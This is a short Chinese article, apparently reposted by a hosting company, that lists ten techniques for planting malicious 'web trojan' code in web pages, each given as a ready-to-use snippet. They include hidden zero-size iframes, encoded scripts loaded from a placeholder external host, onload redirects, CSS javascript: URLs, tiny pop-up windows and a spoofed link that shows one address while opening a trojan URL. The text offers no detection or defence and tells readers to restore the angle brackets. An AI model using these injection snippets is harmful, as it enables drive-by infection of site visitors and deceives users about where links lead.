对网页被挂马的10种样式的认识

框架挂马[iframe src=地址 width=0 height=0][/iframe]

网页被挂马的10种样式之一:框架挂马

[iframe src=地址 width=0 height=0][/iframe]

网页被挂马的10种样式之二:js文件挂马

首先将以下代码 document.write("[iframe width='0' height='0' src='地址'][/iframe]");

保存为xxx.js，

则JS挂马代码为 [script language=javascript src=xxx.js][/script]

网页被挂马的10种样式之三:js变形加密

[SCRIPT language="JScript.Encode"

src=http://www.abcdefg.com/muma.txt][/script]

muma.txt可改成任意后缀

网页被挂马的10种样式之四:body挂马

[body onload="window.location='地址';"][/body]

网页被挂马的10种样式之五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML

+ '\r\n[iframe src="http://www.abcdefg.com/muma.htm/"][/iframe]';

网页被挂马的10种样式之六:css中挂马

body { background-image: url('javascript:document.write("[script

src=http://www.abcdefg.net/muma.js][/script]")')}

网页被挂马的10种样式之七:JAJA挂马

[SCRIPT language=javascript] window.open ("地址","",

"toolbar=no,location=no,

directories=no,status=no,menubar=no,scro

llbars=no,width=1,height=1"); [/script]

网页被挂马的10种样式之八:图片伪装

[html] [iframe src="网马地址" height=0 width=0][/iframe]

[img src="图片地址"][/center]

[/html]

网页被挂马的10种样式之九:伪装调用：

[frameset rows="444,0" cols="*"]

[frame src="打开网页" framborder="no" scrolling="auto" noresize

marginwidth="0"margingheight="0"]

[frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"]

[frameset]

网页被挂马的10种样式之十:高级欺骗

[a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)"

onMouseOver="www_163_com(); return true;"] 页面要显示的内容 [/a]

[SCRIPT Language="JavaScript"]

function www_163_com ()

{ var url="网马地址";

open

(url,"NewWindow","toolbar=no,location=no,directories=no,

status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,

width=800,height=600,left=10,top=10");

} [/SCRIPT]

以上[]得用尖括号代替

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]